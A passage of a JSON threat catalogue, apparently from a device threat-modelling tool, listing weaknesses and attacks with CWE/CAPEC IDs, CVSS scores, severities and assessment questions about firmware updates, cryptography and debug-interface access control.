jamming","Description":"","OriginTypes":[2],"Weakness":{},"ThreatIntroduced":["O"],"ThreatExploited":["O"],"threatCategorieIDs":["b869918c-0b47-45c3-8fab-0b698043aa66"],"AttackTechnique":{"CAPECID":601,"CVSS":{"AV":"A","AC":"L","PR":"N","UI":"N","S":"U","C":"L","I":"N","A":"H","Score":7.1}},"Severity":3},{"ID":"0b47795b-b42d-49d1-bf50-7f4889994fea","Name":"Improper certificate validation","Description":"Missing or incorrect certificate validation, e.g. improper validation of chain of trust, expiration, revocation, etc. ","OriginTypes":[1],"Weakness":{"CWEID":295},"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["8a3d81d9-3317-4e5d-88fe-a0e0592295fe","d0bcd70c-fbad-4a16-a606-8b0682ae7afe","f7639a0c-e85b-4947-bbec-2ac4a0911827"],"Severity":3},{"ID":"d92ccd9c-3a24-4e07-a2ca-c1e9949bb386","Name":"Improper input validation","Description":"","OriginTypes":[1],"Weakness":{"CWEID":20},"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","b869918c-0b47-45c3-8fab-0b698043aa66","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","c46b7c74-5979-409d-8ceb-631b8833c596"],"Severity":3},{"ID":"ef144ae1-4c70-400e-8222-b8a7dd3bf3e9","Name":"Cleartext storage of sensitive information ","Description":"","OriginTypes":[1],"Weakness":{"CWEID":312},"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf"],"Severity":3},{"ID":"e851a284-6b41-41c9-9efd-dc8b01f788da","Name":"Cleartext storage on physical storage","Description":"","OriginTypes":[1],"Weakness":{"CWEID":313},"ThreatIntroduced":["C","I"],"ThreatExploited":["O"],"threatCategorieIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","c46b7c74-5979-409d-8ceb-631b8833c596"],"Severity":3},{"ID":"bb7358c1-e5b6-424f-962d-daab17345b63","Name":"Cleartext transmission of sensitive data","Description":"","OriginTypes":[1],"Weakness":{"CWEID":319},"ThreatIntroduced":["C","I"],"ThreatExploited":["O"],"threatCategorieIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","8a3d81d9-3317-4e5d-88fe-a0e0592295fe"],"Severity":3},{"ID":"001ba17c-0400-4369-912e-0ceda3ccd227","Name":"Improper message integrity verification","Description":"","OriginTypes":[1],"Weakness":{"CWEID":924},"ThreatIntroduced":["C","I"],"ThreatExploited":["O"],"threatCategorieIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","d0bcd70c-fbad-4a16-a606-8b0682ae7afe","f7639a0c-e85b-4947-bbec-2ac4a0911827"],"Severity":2},{"ID":"1a511f9e-5d1b-47b9-9071-4d39407cc75c","Name":"Improper neutralization in SQL command","Description":"","OriginTypes":[1,2],"Weakness":{"CWEID":89},"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596"],"AttackTechnique":{"CAPECID":66,"CVSS":{}},"Severity":3},{"ID":"f0ef09ed-0cde-4b12-beb6-f1640132f3e6","Name":"Plaintext password storage","Description":"","OriginTypes":[1],"Weakness":{"CWEID":256},"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","4f5e6bf4-c9c4-4ea6-9b0e-5c861570e6ec","c46b7c74-5979-409d-8ceb-631b8833c596"],"Severity":3},{"ID":"0e3c0e3e-1587-46f8-93ea-e9091dff5958","Name":"Use of hash w/o salt","Description":"","OriginTypes":[1,2],"Weakness":{"CWEID":759},"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"],"AttackTechnique":{"CAPECID":55,"CVSS":{}},"Severity":2},{"ID":"d46f6e31-ae41-4d6e-93fc-0e6c3bbb295d","Name":"Missing authentication for critical function","Description":"","OriginTypes":[1],"Weakness":{"CWEID":306},"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"],"Severity":3},{"ID":"be14adbc-19a7-48c8-8f13-2566559e63e2","Name":"Malicious code implanted during programming","Description":"","OriginTypes":[2],"Weakness":{},"ThreatIntroduced":["P"],"ThreatExploited":["O"],"threatCategorieIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","f2ba26f4-b2da-49a8-aba2-14e42a746d6a"],"AttackTechnique":{"CAPECID":672,"CVSS":{}},"Severity":2},{"ID":"21c6b5ef-82c7-41e5-bb07-de93445b2156","Name":"Replacement with malicious peripheral","Description":"Alteration of PCB (processor, data store, interface controller, any IC) to bypass restrictions, access data, etc.","OriginTypes":[2],"Weakness":{},"ThreatIntroduced":["P","D"],"ThreatExploited":["P","D"],"threatCategorieIDs":["c0bd6e2f-9784-4c11-9aee-115a966e0a4d","c46b7c74-5979-409d-8ceb-631b8833c596"],"AttackTechnique":{"CAPECID":439,"CVSS":{}},"Severity":3},{"ID":"90a4e8f3-c750-47c4-97fd-fa9e25b9b599","Name":"Factory oversupply","Description":"The contracted manufacturer produces more parts than specified and keeps/resells the surplus.","OriginTypes":[],"Weakness":{},"ThreatIntroduced":["P"],"ThreatExploited":["P"],"threatCategorieIDs":["a6a57921-7fcb-4f54-b0f5-bac0a0f74163","ddf75d3c-ac5a-4ca2-8268-a4f7b40add7d"],"Severity":2},{"ID":"a912b48a-3b4d-44ab-b8f3-28000ca945c4","Name":"Provisioning data cloning","Description":"The contracted manufacturer clones data that was initially inserted (e.g., key material).","OriginTypes":[],"ThreatIntroduced":["P"],"ThreatExploited":["P","D"],"threatCategorieIDs":[],"Severity":2},{"ID":"97b5a1d4-be82-4485-82f6-e4532795a20b","Name":"Algorithm downgrade","Description":"","OriginTypes":[1],"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["8a3d81d9-3317-4e5d-88fe-a0e0592295fe","d0bcd70c-fbad-4a16-a606-8b0682ae7afe","f7639a0c-e85b-4947-bbec-2ac4a0911827"],"Weakness":{"CWEID":757},"Severity":3},{"ID":"a20d6e53-4426-4700-a04f-a4018bc7bfce","Name":"Weak block cipher mode","Description":"Deprecated block cipher modes, such as ECB or CBC, do not provide enough security.","OriginTypes":[],"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["8a3d81d9-3317-4e5d-88fe-a0e0592295fe","d0bcd70c-fbad-4a16-a606-8b0682ae7afe","f7639a0c-e85b-4947-bbec-2ac4a0911827"],"Severity":3},{"ID":"680ceebd-357c-49d6-8bfd-390dc6c51dde","Name":"Nonce reuse","Description":"","OriginTypes":[1],"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["8a3d81d9-3317-4e5d-88fe-a0e0592295fe","d0bcd70c-fbad-4a16-a606-8b0682ae7afe","f7639a0c-e85b-4947-bbec-2ac4a0911827"],"Weakness":{"CWEID":323},"Severity":3},{"ID":"c23a62c8-901a-412b-80b8-d2574103b733","Name":"Firmware downgrade","Description":"For practical reasons a downgrade is probably necessary, but security patches should not be reversible (e.g. by using special security version numbers).","OriginTypes":[1],"ThreatIntroduced":["I"],"ThreatExploited":["U"],"threatCategorieIDs":["b869918c-0b47-45c3-8fab-0b698043aa66","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","c46b7c74-5979-409d-8ceb-631b8833c596"],"Weakness":{"CWEID":1328},"Severity":3},{"ID":"a0729a41-bcc9-43d8-9c86-bfb26c64e93c","Name":"Inadequate encryption strength","Description":"","OriginTypes":[1],"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf"],"Weakness":{"CWEID":326},"Severity":2},{"ID":"9538abd8-f79c-4097-b2dd-716e50a125ee","Name":"Permissive status display","Description":"Details about status, configuration, software version, metadata, logging data, operation status, etc. are shown to unauthorized users","OriginTypes":[1],"ThreatIntroduced":["C","I"],"ThreatExploited":["O"],"threatCategorieIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf"],"Weakness":{"CWEID":200},"Severity":2},{"ID":"b9436449-7896-4be6-89f8-a19e1c8d014f","Name":"Missing password field masking","Description":"","OriginTypes":[1,2],"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596"],"Weakness":{"CWEID":549},"AttackTechnique":{"CAPECID":508,"CVSS":{"AV":"L","AC":"L","PR":"N","UI":"R","S":"U","C":"H","I":"L","A":"L","Score":6.6}},"Severity":2},{"ID":"5435aa9a-ad52-470f-8fa5-81a4f926b6a6","Name":"Weak password requirements","Description":"","OriginTypes":[1],"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"],"Weakness":{"CWEID":521},"Severity":3},{"ID":"723dfb40-4ceb-4232-bda5-73bcb3c76ac0","Name":"Hard-coded credentials","Description":"","OriginTypes":[1],"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"],"Weakness":{"CWEID":798},"Severity":4},{"ID":"5e7fd04c-0e14-4c76-800d-f581bcf7c7f6","Name":"Default password","Description":"A common vulnerability are default credentials that can be found in the manual.","OriginTypes":[2],"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"],"AttackTechnique":{"CAPECID":560,"CVSS":{"AV":"A","A":"H","C":"H","I":"L","Score":8.3}},"Weakness":{"CWEID":557},"Severity":3},{"ID":"63dfaefa-c8a8-4725-b6d6-2efff7306639","Name":"Single-factor authentication","Description":"","OriginTypes":[1],"ThreatIntroduced":["C","I"],"ThreatExploited":["O"],"threatCategorieIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"],"Weakness":{"CWEID":308},"Severity":2},{"ID":"296e95fe-e06d-4ae3-be84-da98df4a122c","Name":"Missing authentication attempt restriction","Description":"","OriginTypes":[1,2],"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"],"Weakness":{"CWEID":307},"AttackTechnique":{"CAPECID":49,"CVSS":{}},"Severity":2},{"ID":"bf289171-82c3-431a-b3f1-28d17e5a6546","Name":"Insufficient session expiration","Description":"","OriginTypes":[1],"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"],"Weakness":{"CWEID":613},"Severity":2},{"ID":"2f483201-0209-4320-ba2e-2d692274aab5","Name":"Password recovery mechanism","Description":"","OriginTypes":[1],"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"],"Weakness":{"CWEID":638},"Severity":2},{"ID":"4ee3fc8a-87a5-4fdf-868f-fb35cd12dc91","Name":"Client-side password hashing","Description":"","OriginTypes":[1],"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"],"Weakness":{"CWEID":836},"Severity":3},{"ID":"05e04798-41ce-4919-a92b-264f7e985de2","Name":"Password hash with predictable salt","Description":"","OriginTypes":[1],"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"],"Weakness":{"CWEID":760},"Severity":1},{"ID":"e6c3d6f5-f4c7-48b7-b516-2092c3557c81","Name":"IC reverse engineering","Description":"","OriginTypes":[1],"ThreatIntroduced":["C","I"],"ThreatExploited":["O"],"threatCategorieIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596","ddf75d3c-ac5a-4ca2-8268-a4f7b40add7d"],"Weakness":{"CWEID":1278},"Severity":2},{"ID":"1447713d-9ad6-454e-81d8-c9f4ef34c72b","Name":"Battery draining attack ","Description":"Denial of sleep, flooding attacks","OriginTypes":[2],"ThreatIntroduced":["C"],"ThreatExploited":["O"],"threatCategorieIDs":["9e715340-1a69-47df-864a-7c3b5a9a678e","b869918c-0b47-45c3-8fab-0b698043aa66","08d8fbba-5de4-4538-8674-43e214c3ebad","f2ba26f4-b2da-49a8-aba2-14e42a746d6a"],"AttackTechnique":{"CAPECID":125,"CVSS":{}},"Severity":2},{"ID":"195d942e-02f8-49ad-873f-299f4b4ad4ec","Name":"HID/Keyboard spoofing","Description":"An USB stick imitates a keyboard to inject commands. The stick may be a present or found in the parking lot.","OriginTypes":[2],"ThreatIntroduced":["C"],"ThreatExploited":["O"],"threatCategorieIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","c46b7c74-5979-409d-8ceb-631b8833c596","b1ff0675-f9b7-4ffb-bdd5-f621c6580d9a"],"AttackTechnique":{"CAPECID":null,"CVSS":{"AV":"L","AC":"L","PR":"L","UI":"R","C":"H","I":"H","A":"H"}},"Severity":3},{"ID":"cf948333-b659-40ff-b93f-d4bdc8c980d1","Name":"Phishing","Description":"","OriginTypes":[2],"ThreatIntroduced":["O"],"ThreatExploited":["O"],"threatCategorieIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","c46b7c74-5979-409d-8ceb-631b8833c596"],"AttackTechnique":{"CVSS":{},"CAPECID":98},"Severity":3},{"ID":"915f674e-926b-4bd9-94cb-ee8b4637bc80","Name":"USB Killer","Description":"A device that looks similar to an USB flash drive creates high-voltage pulses to damage/destroy the hardware. This type of attack is also possible at other interfaces than USB as there are publicly available adapter for HDMI and Thunderbolt, for example.","OriginTypes":[2],"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["b869918c-0b47-45c3-8fab-0b698043aa66","88d19822-b1b0-469f-ae00-1bc600ccaa1d","644f8521-6b49-41bc-86df-4064b89fb881","96bdc11d-dbb0-4785-8a5c-373e2c492eb0"],"AttackTechnique":{"CVSS":{"AV":"L","AC":"L","PR":"N","UI":"R","S":"U","C":"N","I":"L","A":"H","Score":6.1}},"Severity":3},{"ID":"f5949698-47d4-48ee-a116-2d212695c41f","Name":"Port scanning","Description":"","OriginTypes":[2],"ThreatIntroduced":[],"ThreatExploited":["O"],"threatCategorieIDs":[],"AttackTechnique":{"CVSS":{"AV":"A","AC":"L","PR":"N","UI":"N","S":"U","C":"L","I":"N","A":"N","Score":4.3},"CAPECID":300},"Severity":1},{"ID":"b8835cb9-3c77-496e-ac2d-2ed6fa7f2d78","Name":"Protocol manipulation","Description":"","OriginTypes":[2],"ThreatIntroduced":["C","I"],"ThreatExploited":["O"],"threatCategorieIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","8a3d81d9-3317-4e5d-88fe-a0e0592295fe","f7639a0c-e85b-4947-bbec-2ac4a0911827"],"AttackTechnique":{"CVSS":{},"CAPECID":272},"Severity":2},{"ID":"573881b4-ceb6-4d6a-a5c3-9c0e6c5a3b3c","Name":"Actuator command injection","Description":"","OriginTypes":[2],"ThreatIntroduced":["C","I"],"ThreatExploited":["O"],"threatCategorieIDs":[],"AttackTechnique":{"CVSS":{}},"Severity":3},{"ID":"a76b8768-9d68-4074-b5e1-0f9abc61bcda","Name":"Sensor data manipulation","Description":"","OriginTypes":[2],"ThreatIntroduced":["C","I"],"ThreatExploited":["O"],"threatCategorieIDs":["f7639a0c-e85b-4947-bbec-2ac4a0911827","f2ba26f4-b2da-49a8-aba2-14e42a746d6a","b7935cfe-6a41-45e4-8778-f0fbb1e4018b"],"AttackTechnique":{"CVSS":{}},"Severity":3},{"ID":"30cf5142-2339-4130-8a6e-2b05869e6df2","Name":"Physical theft","Description":"","OriginTypes":[2],"ThreatIntroduced":["O"],"ThreatExploited":["O"],"threatCategorieIDs":["a6a57921-7fcb-4f54-b0f5-bac0a0f74163","6b8c08cb-3f02-413a-96b4-179bb1f67997"],"AttackTechnique":{"CVSS":{"AV":"L","AC":"L","PR":"N","UI":"N","S":"U","C":"N","I":"N","A":"H","Score":6.2},"CAPECID":507},"Severity":2},{"ID":"c7787e71-5c70-462c-9558-ce20e7cfdfe8","Name":"Selective forwarding","Description":"Selective forwarding of messages/network packets ","OriginTypes":[2],"ThreatIntroduced":[],"ThreatExploited":["O"],"threatCategorieIDs":["f7639a0c-e85b-4947-bbec-2ac4a0911827","f3fe9ca9-4c34-40fc-a270-3e6252d01e6f","f2b91aaf-7d9f-4baf-8713-13d7625174d9"],"AttackTechnique":{"CVSS":{}},"Severity":2},{"ID":"184cd5e5-2517-4d7f-a81a-c411942d3601","Name":"Unpublished interfaces","Description":"","OriginTypes":[1,2],"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596"],"AttackTechnique":{"CVSS":{"C":"H","Score":9.8,"I":"H","A":"H"},"CAPECID":36},"Weakness":{"CWEID":1242},"Severity":3},{"ID":"83d23b79-71c5-488e-adb2-dd0f76d70f44","Name":"Firmware modification","Description":"","OriginTypes":[2],"ThreatIntroduced":["I"],"ThreatExploited":["U"],"threatCategorieIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","b869918c-0b47-45c3-8fab-0b698043aa66","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596"],"AttackTechnique":{"CVSS":{"A":"H","Score":9.8,"I":"H","C":"H"},"CAPECID":165},"Severity":4},{"ID":"afd4bceb-31b0-41cd-9eae-02d2eba6b41c","Name":"Insufficient logging","Description":"","OriginTypes":[1],"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["c17cbe5c-3210-42fc-be1e-05f1f915865b"],"Weakness":{"CWEID":778},"Severity":2},{"ID":"f170308a-c188-4ae0-bcef-d04af1e429b3","Name":"Mutable Root of Trust","Description":"","OriginTypes":[1],"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596"],"Weakness":{"CWEID":1326},"Severity":3},{"ID":"cf63f187-4353-4bf8-bc37-a7392c6d91bf","Name":"TOCTOU attack","Description":"","OriginTypes":[1,2],"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","c46b7c74-5979-409d-8ceb-631b8833c596"],"AttackTechnique":{"CVSS":{"A":"H","Score":9.8,"I":"H","C":"H"},"CAPECID":29},"Weakness":{"CWEID":367},"Severity":3},{"ID":"ffd6083b-7183-472c-b250-15b0de223735","Name":"Password sharing","Description":"Users/Employees share the password, e.g. using a note next to the device.","OriginTypes":[],"ThreatIntroduced":["S","O"],"ThreatExploited":["O"],"threatCategorieIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"],"Severity":2},{"ID":"66c5f951-6286-4b22-a71a-ee4d6232f689","Name":"Incorrect default permissions","Description":"","OriginTypes":[1],"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","4f5e6bf4-c9c4-4ea6-9b0e-5c861570e6ec"],"Weakness":{"CWEID":276}},{"ID":"eab94c5b-f7e8-4b2a-9ffb-658aefc8f0d0","Name":"Insufficiently protected credentials","Description":"","OriginTypes":[1],"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596"],"Weakness":{"CWEID":522},"Severity":3},{"ID":"06c24920-2ce3-49ca-8134-9fa81fb2cdef","Name":"Identity spoofing","Description":"","OriginTypes":[2],"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","4f5e6bf4-c9c4-4ea6-9b0e-5c861570e6ec","c46b7c74-5979-409d-8ceb-631b8833c596","3bbe354c-317a-4f76-bdbb-75543b5d5aa4"],"AttackTechnique":{"CVSS":{},"CAPECID":151},"Severity":2},{"ID":"71f761e4-8149-4a88-92fd-35f9d99cc0ef","Name":"Logging sensitive information","Description":"","OriginTypes":[1],"ThreatIntroduced":["I"],"ThreatExploited":["O","M"],"threatCategorieIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf"],"Weakness":{"CWEID":532},"Severity":3},{"ID":"6bf04ffa-1f83-4637-a866-d02ff10d752b","Name":"Sensitive information exposed","Description":"","OriginTypes":[1],"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf"],"Weakness":{"CWEID":200},"Severity":3},{"ID":"e36eff83-1863-4026-bffe-966a9a104331","Name":"Uncaught exception","Description":"","OriginTypes":[1],"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["b869918c-0b47-45c3-8fab-0b698043aa66","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf"],"Weakness":{"CWEID":248},"Severity":2},{"ID":"6509fe5f-7e27-40ec-bd08-97e29c67f8c1","Name":"Use of expired certificate","Description":"","OriginTypes":[1],"ThreatIntroduced":["I","O"],"ThreatExploited":["O"],"threatCategorieIDs":["c46b7c74-5979-409d-8ceb-631b8833c596","8a3d81d9-3317-4e5d-88fe-a0e0592295fe","d0bcd70c-fbad-4a16-a606-8b0682ae7afe","f7639a0c-e85b-4947-bbec-2ac4a0911827"],"Weakness":{"CWEID":324},"Severity":2},{"ID":"ed84da5f-3181-4be1-bef4-d911077b1910","Name":"Improper check of certificate revocation","Description":"","OriginTypes":[1],"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["c46b7c74-5979-409d-8ceb-631b8833c596","8a3d81d9-3317-4e5d-88fe-a0e0592295fe","d0bcd70c-fbad-4a16-a606-8b0682ae7afe","f7639a0c-e85b-4947-bbec-2ac4a0911827"],"Weakness":{"CWEID":299},"Severity":2},{"ID":"b26fc3e4-7a38-4f00-acdb-ec78246d0b25","Name":"Improper certificate chain verification","Description":"","OriginTypes":[1],"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["c46b7c74-5979-409d-8ceb-631b8833c596","8a3d81d9-3317-4e5d-88fe-a0e0592295fe","d0bcd70c-fbad-4a16-a606-8b0682ae7afe","f7639a0c-e85b-4947-bbec-2ac4a0911827"],"Weakness":{"CWEID":296},"Severity":2},{"ID":"3162421f-ca5b-400d-bbe8-58a510be9abf","Name":"Missing authorization check","Description":"","OriginTypes":[1],"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c17cbe5c-3210-42fc-be1e-05f1f915865b","c46b7c74-5979-409d-8ceb-631b8833c596"],"Weakness":{"CWEID":862},"Severity":3},{"ID":"4e007b60-94e7-4df3-b3bd-109eb8627da2","Name":"Replay attack","Description":"Replaying a capture network package","OriginTypes":[1],"ThreatIntroduced":["I","C"],"ThreatExploited":["O"],"threatCategorieIDs":["d0bcd70c-fbad-4a16-a606-8b0682ae7afe","f3fe9ca9-4c34-40fc-a270-3e6252d01e6f"],"Weakness":{"CWEID":294},"Severity":2},{"ID":"b48781b2-24a2-481b-b7c1-3390dbeeb973","Name":"Cross Site Scripting (XSS)","Description":"See CWE-79 and CAPEC-63","OriginTypes":[1,2],"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596"],"Weakness":{"CWEID":79},"AttackTechnique":{"CVSS":{},"CAPECID":63},"Severity":4},{"ID":"04d5f07e-2482-451b-9e24-94cb650da53b","Name":"Use of broken/risky cryptographic algorithm","Description":"","OriginTypes":[1],"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c17cbe5c-3210-42fc-be1e-05f1f915865b"],"Weakness":{"CWEID":327},"Severity":3},{"ID":"7742f998-ab1e-4f64-8ac6-12b3f97b936a","Name":"Unawareness","Description":"The affected subject is not aware of the collection, processing, storage, or sharing of the subject\'s data.","OriginTypes":[],"ThreatIntroduced":["C","I"],"ThreatExploited":["O"],"threatCategorieIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","aead4d1d-0f64-42b4-a512-cbbc979af3ca","7bbfe5d3-8a91-4210-99ab-79f670715e61"]},{"ID":"0217b20a-5e3a-4244-8dce-819e28050a47","Name":"Credential stuffing","Description":"","OriginTypes":[2],"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"],"AttackTechnique":{"CVSS":{},"CAPECID":600},"Severity":3},{"ID":"1909127e-50bd-4892-8b1f-1a2123a4fa61","Name":"Password spraying","Description":"","OriginTypes":[2],"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"],"AttackTechnique":{"CVSS":{},"CAPECID":565},"Severity":3},{"ID":"e060675a-41d0-4c4d-9e16-311bb4adec7b","Name":"Insecure default settings","Description":"","OriginTypes":[1],"ThreatIntroduced":["C","I","S"],"ThreatExploited":["O"],"threatCategorieIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596"],"Weakness":{"CWEID":1188},"Severity":2}],"threatQuestions":[{"ID":"5e4b4f24-6c61-4f68-ad6f-4bbce2240a36","Name":"Updatable","Description":"","OptionType":1,"componentTypeID":"ca502567-bafc-40f9-a5e4-8ce94780c3f6","Question":"Does the device provide the ability to update or patch the firmware?","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"propertyID":"367b80cd-1b41-483b-a157-b143714b8af7"},{"ID":"04f0bcc3-540b-462a-985b-e327acaed25d","Name":"Risky cryptographic algorithm ","Description":"No use of custom encryption schemes, deprecated algorithms (DES, MD5, SHA1, etc.)","OptionType":1,"componentTypeID":"838f741c-120e-4b73-951a-d55a11d36ca4","Question":"Does the device use only secure, standardized, and approved cryptographic algorithms?","ChangesPerOption":{"general.Yes":{"Active":true,"Value":false},"general.No":{"Active":true,"Value":true},"general.N/A":{"Active":false}},"propertyID":"783c742d-ebbf-4a58-b8c9-bdc0faeff57d"},{"ID":"f56819e0-d966-4cd7-a514-8c3f944e176c","Name":"Improper access control","Description":"","OptionType":1,"componentTypeID":"2d746c06-a57d-41af-9712-f9d8059425eb","Question":"Does the device implement and correctly perform access control on physical debug/test interfaces to check users\' authorization? ","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"propertyID":"f40ce61a-c823-4ca7-ab51-a70dbd9718a6"},{"ID":"bf172d28-de23-4b6f-b308-1d919e9f35a1","Name":"Internal assets exposed","Description":"","OptionType":1,"componentTypeID":"2d746c06-a57d-41af-9712-f9d8059425eb","Question":"[Has access control] Does the device, supporting multiple debug access levels, assign the right access level to internal assets?","ChangesPerOption":{"general.Yes":{"Active":true,"Value":false},"general.No":{"Active":true,"Value":true},"general.N/A":{"Active":false}},"propertyID":"517b62dd-eea7-426e-82c6-2c458eed0aaf"},{"ID":"d0c8f335-4df1-4719-ad49-ac60573cc59d","Name":"Hardware Feature Restriction","Description":"Hardware functionality can be used to modify the memory or to observe physical side channels.","OptionType":1,"componentTypeID":"6c83ccbc-ffbd-4bd6-b207-07386e3393c5","Question":"Does the device restrict access to software-controllable device functionality (e.g. power and clock management)?","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"propertyID":"4d88ce07-2a06-4ae3-942a-46eb25ccdd9b"},{"ID":"835439f8-ce55-4a20-a448-4c2f62097869","Name":"Address Region Overlap","Description":"","OptionType":1,"componentTypeID":"ea189855-6883-489f-a3d0-77d4ac51a6ef","Question":"Does the device allow overlapping of address regions (possibly leading to bypassing of memory 